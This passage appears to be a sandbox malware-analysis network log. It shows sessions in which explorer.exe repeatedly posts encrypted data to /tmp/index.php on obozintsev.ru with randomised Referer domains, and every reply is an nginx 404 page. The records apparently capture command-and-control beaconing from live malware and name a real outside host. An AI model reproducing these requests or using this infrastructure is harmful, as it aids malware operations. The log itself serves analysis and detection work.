4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49819	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:21.415868998 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rtjqjvueogqtxkos.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: obozintsev.ru
Nov 30, 2024 11:13:21.415903091 CET	295	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 79 25 a8 b5 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuy%HUPTv;Ie:e, Gt@(3:</8`b3GKpEh^DMHx^XYDvS4D{[)r}rRT0Q)
Nov 30, 2024 11:13:23.208852053 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49823	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:23.331949949 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ghrwspfuixcrwvx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: obozintsev.ru
Nov 30, 2024 11:13:23.331978083 CET	327	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 47 54 eb 93 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuGTBsnPWOB;?>{xC?@e25P\)+D}M2*bGhF0Dqxt3]O8fpbK_ZOkI;
Nov 30, 2024 11:13:25.128737926 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49828	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:25.453610897 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qyqahwjnqtjwf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: obozintsev.ru
Nov 30, 2024 11:13:25.453622103 CET	153	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 49 30 a8 fd Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuI0N>f^Mg+x".<:wy#7;^25LMgK2
Nov 30, 2024 11:13:27.262444973 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49834	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:27.394815922 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jjaaaitryycjvb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: obozintsev.ru
Nov 30, 2024 11:13:27.394829035 CET	284	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7b 06 df 9e Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu{QJf'Mn@ :6A@{M{Ov]XB9C6)\ef(/LxtAs0Sip_52J
Nov 30, 2024 11:13:29.204399109 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49840	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:29.328526020 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://reqhcetbeojgkny.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: obozintsev.ru
Nov 30, 2024 11:13:29.328557014 CET	279	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5f 07 d0 8e Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu_P2E'~_@tz/'>Hb#PV92>T`42$dY]ZGS%ztGQ5Nsq=>Bgb%=0"
Nov 30, 2024 11:13:31.076697111 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49842	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:31.237323999 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsgtchrbqowj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: obozintsev.ru
Nov 30, 2024 11:13:31.237354040 CET	355	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 59 32 e2 e0 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuY2Tn_O}\zK!2U\|-z?zA0#?\|[I^p5OXz[LM;L2-kK5vkD]\3hBJ8:1e
Nov 30, 2024 11:13:33.046477079 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49847	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:33.190927982 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kjjcaejlhnascj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: obozintsev.ru
Nov 30, 2024 11:13:33.191423893 CET	318	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 77 0c ba f2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuw2o\v_dGnt04-;G+_K1tI@EJe?~k~Q7+/Aq(1U>;9zl>?]?@FmD"@(
Nov 30, 2024 11:13:34.992533922 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49853	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:35.123045921 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ansopymmtehxip.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: obozintsev.ru
Nov 30, 2024 11:13:35.123065948 CET	319	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 31 5e f9 95 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu1^NXyeb=;p,<Z?[HSC<=>4iKBmzO8S.4;{8DC8sD\|YFBM/6_>\|
Nov 30, 2024 11:13:36.925482988 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49859	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:13:37.061934948 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wyqtmqrstxfymqsq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: obozintsev.ru
Nov 30, 2024 11:13:37.062011957 CET	183	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 4e 3b fc a1 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[+k,vuN;9[Pq5^z3?zs2_WV[J[RXvY5HGM8!w7DEbW~
Nov 30, 2024 11:13:39.051615000 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:13:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 